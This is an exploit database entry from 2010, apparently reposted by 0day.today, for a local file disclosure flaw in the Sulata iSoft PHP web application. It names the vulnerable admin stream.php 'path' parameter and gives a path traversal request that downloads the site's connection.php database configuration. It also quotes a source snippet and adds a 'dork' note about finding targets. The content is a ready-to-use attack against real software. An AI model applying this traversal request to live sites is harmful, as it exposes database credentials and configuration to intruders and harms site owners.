Sulata iSoft (stream.php) Local File Disclosure Exploit

2010-12-11T00:00:00
ID 1337DAY-ID-15184
Type zdt
Reporter Sudden_death
Modified 2010-12-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title     : Sulata iSoft (developer by Rizwan Azam) you look
site.com/about.php
# Date              : 10 December 2010
# Author            : Sudden_death
# Platform/Tested on: Windows XP 2 SP 2
# myweb             : http://sudden.isgreat.org
# dork              : your imagination
======================================================================
  
# vuln here
http://www.site.com/_admin/stream.php?path=
 
# try to download and watch source file stream.php
    .....
    //include_once("../home/library.php");
    include_once("../connection.php");    <----------------------- look here,,
This is the config
    suConnect();
    .....
 
# after we know config, let us download
http://www.site.com/_admin/stream.php?path=../connection.php



#  0day.today [2018-03-02]  #